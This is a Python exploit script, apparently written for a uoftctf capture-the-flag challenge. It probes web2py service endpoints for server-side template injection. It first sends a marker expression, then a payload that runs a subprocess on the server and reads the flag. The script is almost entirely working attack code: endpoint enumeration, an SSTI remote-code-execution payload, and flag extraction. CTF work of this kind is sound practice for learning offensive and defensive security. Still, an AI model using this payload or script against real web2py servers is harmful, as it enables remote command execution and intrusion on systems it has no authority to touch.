#!/usr/bin/env python3
"""
Test web2py service endpoints for SSTI
"""

import requests
import urllib3
import re

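# Silence only the InsecureRequestWarning that verify=False triggers on every
# request; a bare disable_warnings() would also hide unrelated urllib3
# warnings (deprecations, bad header values) that we want to see.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Origin of the target application; the endpoint paths are appended to it.
BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"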

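def _marker_context(text, marker, window=200):
    """Return up to *window* chars either side of the first *marker* in *text*.

    Returns ``None`` when *marker* does not occur. The caller inspects the
    window to decide whether the marker was rendered by the template engine
    or merely echoed into an inline ``<script>`` block.
    """
    idx = text.find(marker)
    if idx < 0:
        return None
    return text[max(0, idx - window):idx + window]


def _extract_flags(text):
    """Return every ``uoftctf{...}`` token in *text*, in order of appearance."""
    return re.findall(r'uoftctf\{[^}]+\}', text)


def test_service_endpoints(base_url=BASE_URL, timeout=10):
    """Probe the web2py ``/call/`` service endpoints for template injection.

    For each endpoint a harmless marker expression is sent once by GET and
    once by POST. When the GET response reflects the marker outside a
    ``<script>`` block, the flag-reading payload is sent to that endpoint and
    the response is scanned for a flag; if none is found the raw response is
    written to ``service_response.html`` for manual inspection.

    Args:
        base_url: Origin of the target application; defaults to ``BASE_URL``.
        timeout: Per-request timeout in seconds.

    Returns:
        The first flag string found, or ``None`` if no endpoint yielded one.
    """
    endpoints = [
        "/welcome/default/call/json",
        "/welcome/default/call/xml",
        "/welcome/default/call/jsonrpc",
        "/welcome/default/call/jsonrpc2",
        "/welcome/default/call",
    ]

    # SSTI payload
    ssti_payload = "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"
    test_payload = "{{='SSTI_TEST_MARKER'}}"
    marker = "SSTI_TEST_MARKER"
    banner = "=" * 60

    for endpoint in endpoints:
        url = base_url + endpoint
        print(f"\n{banner}")
        print(f"Testing: {endpoint}")
        print(banner)

        # Try GET with parameter
        try:
            response = requests.get(
                url,
                params={"test": test_payload},
                # Certificate validation is off, so the response is not
                # authenticated and could be altered in transit; kept as the
                # author chose for this host.
                verify=False,
                timeout=timeout,
            )
            print(f"GET Status: {response.status_code}")

            context = _marker_context(response.text, marker)
            if context is not None:
                print("[+] Marker found in response!")

                # A marker inside <script> was most likely just echoed into
                # JS; only a bare reflection is treated as template evaluation.
                if "<script" not in context:
                    print("[!!!] Marker found outside script tags!")

                    # Try RCE payload
                    print("\n[*] Trying RCE payload...")
                    rce_response = requests.get(
                        url,
                        params={"test": ssti_payload},
                        verify=False,
                        timeout=timeout,
                    )

                    flags = _extract_flags(rce_response.text)
                    if flags:
                        print("\n[!!!] FLAG FOUND!")
                        for flag in flags:
                            print(f"\nFLAG: {flag}\n")
                        # Return an element of the list rather than the loop
                        # variable, which is unbound when the regex matches
                        # nothing even though "uoftctf{" appeared in the text.
                        return flags[0]

                    # Save response for manual inspection when no flag matched.
                    with open("service_response.html", "w", encoding="utf-8") as f:
                        f.write(rce_response.text)
                    print("Saved to service_response.html")

        except OSError as e:
            # requests.RequestException subclasses OSError, so this covers
            # connection failures and timeouts as well as the file write
            # above, while programming errors still surface.
            print(f"GET Error: {e}")

        # Try POST
        try:
            response = requests.post(
                url,
                data={"test": test_payload},
                verify=False,
                timeout=timeout,
            )
            print(f"POST Status: {response.status_code}")

            if marker in response.text:
                print("[+] Marker found in POST response!")

        except OSError as e:
            print(f"POST Error: {e}")

    return None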

if __name__ == "__main__":
    # Run the probe and, when a flag came back, print it between two rules.
    flag = test_service_endpoints()

    if flag:
        rule = "=" * 60
        print(f"\n{rule}")
        print(f"SUCCESS! FLAG: {flag}")
        print(rule)
